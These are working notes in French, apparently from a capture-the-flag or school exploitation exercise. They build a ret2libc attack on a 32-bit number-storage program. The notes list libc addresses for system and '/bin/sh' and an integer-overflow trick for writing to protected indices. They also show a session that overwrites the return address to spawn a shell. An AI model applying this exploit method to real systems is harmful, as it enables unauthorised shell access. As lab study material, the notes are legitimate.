

segfault a partir de 679 en index
688 pour GDB



index 101 = buffer command (command et local_28) 1684104562 en decimal
adresse de 101 (selon ltrace) : 0xffffd6f8

dans gdb :
p system = 0xf7e6aed0 en lit endian : d0aee6f7 et en decimal = 3501123319




info proc map = 
start addr : 0xf7e2c000
end addr : 0xf7fd0000

find start_addr, end_addr, "/bin/sh" = 0xf7f897ec


\xd0\xae\xe6\xf7 + 4 padding + \xec\x97\xf8\xf7


index 121 = surement adresse de return FFFFD7CC hexa et en decimal = 4294957004


index 114 =  en dec : 4158936339, en hexa : 0xF7E45513
pour store dans index 144 : 2147483762

Pouar acceder a l'index 120: store number: .... index: 2147483648 + 120

index 114 -> return address

Input command: read 114
 Index: 114
 Number at data[114] is 4159090384
 Completed read 114 command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit

114 = 4159090384 -> \xd0\xae\xe6\xf7
115 on met rien mais ca fait office de padding de 4
116 = 4160264172 -> \xec\x97\xf8\xf7


pour convertir addresse en decimal on le converti pas depuis le format little indian mais depuis le format normal

quit est appeler pour executer le return qui a mtn etait remplacer par notre appel a system